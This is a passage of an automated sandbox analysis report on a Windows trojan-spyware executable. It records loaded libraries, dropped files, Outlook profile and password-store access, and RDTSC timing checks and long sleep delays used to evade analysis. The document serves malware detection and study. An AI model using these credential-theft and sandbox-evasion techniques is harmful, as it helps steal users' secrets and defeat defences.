            Source: ZaRP7yvL1J.exe, 00000004.00000002.2932353178.0000000005803000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ZaRP7yvL1J.exe
            Source: ZaRP7yvL1J.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs ZaRP7yvL1J.exe
            Source: ZaRP7yvL1J.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 4_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004034A5
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeMutant created: NULL
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeFile created: C:\Users\user\AppData\Local\Temp\nsyB6C8.tmpJump to behavior
            Source: ZaRP7yvL1J.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E15000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E23000.00000004.00000800.00020000.00000000.sdmp, ZaRP7yvL1J.exe, 00000004.00000002.2950226933.0000000035E05000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: ZaRP7yvL1J.exeReversingLabs: Detection: 57%
            Source: ZaRP7yvL1J.exeVirustotal: Detection: 75%
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeFile read: C:\Users\user\Desktop\ZaRP7yvL1J.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\ZaRP7yvL1J.exe "C:\Users\user\Desktop\ZaRP7yvL1J.exe"
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess created: C:\Users\user\Desktop\ZaRP7yvL1J.exe "C:\Users\user\Desktop\ZaRP7yvL1J.exe"
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess created: C:\Users\user\Desktop\ZaRP7yvL1J.exe "C:\Users\user\Desktop\ZaRP7yvL1J.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: ZaRP7yvL1J.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeCode function: 0_2_6F951B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6F951B5F
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeFile created: C:\Users\user\AppData\Local\Temp\nszB803.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeAPI/Special instruction interceptor: Address: 617FC22
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeAPI/Special instruction interceptor: Address: 461FC22
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeRDTSC instruction interceptor: First address: 6141F67 second address: 6141F67 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1A08CF01A2h 0x00000006 test ecx, ebx 0x00000008 test cx, ax 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d test bx, cx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeRDTSC instruction interceptor: First address: 45E1F67 second address: 45E1F67 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1A08F67CF2h 0x00000006 test ecx, ebx 0x00000008 test cx, ax 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d test bx, cx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeMemory allocated: 35D20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeMemory allocated: 37D20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599843Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599652Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598999Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598671Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598450Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598339Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 598015Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597794Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597468Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597204Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 597082Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596945Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596624Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596296Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595965Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595421Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594874Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594655Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594514Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeThread delayed: delay time: 594288Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeWindow / User API: threadDelayed 2329Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeWindow / User API: threadDelayed 7507Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nszB803.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exeAPI coverage: 3.6 %
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -37815825351104557s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 5404Thread sleep count: 2329 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -599843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 5404Thread sleep count: 7507 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -599652s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -599218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -598999s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -598671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -598450s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -598339s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -598015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -597906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -597794s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -597687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -597578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ZaRP7yvL1J.exe TID: 2860Thread sleep time: -597468s >= -30000sJump to behavior
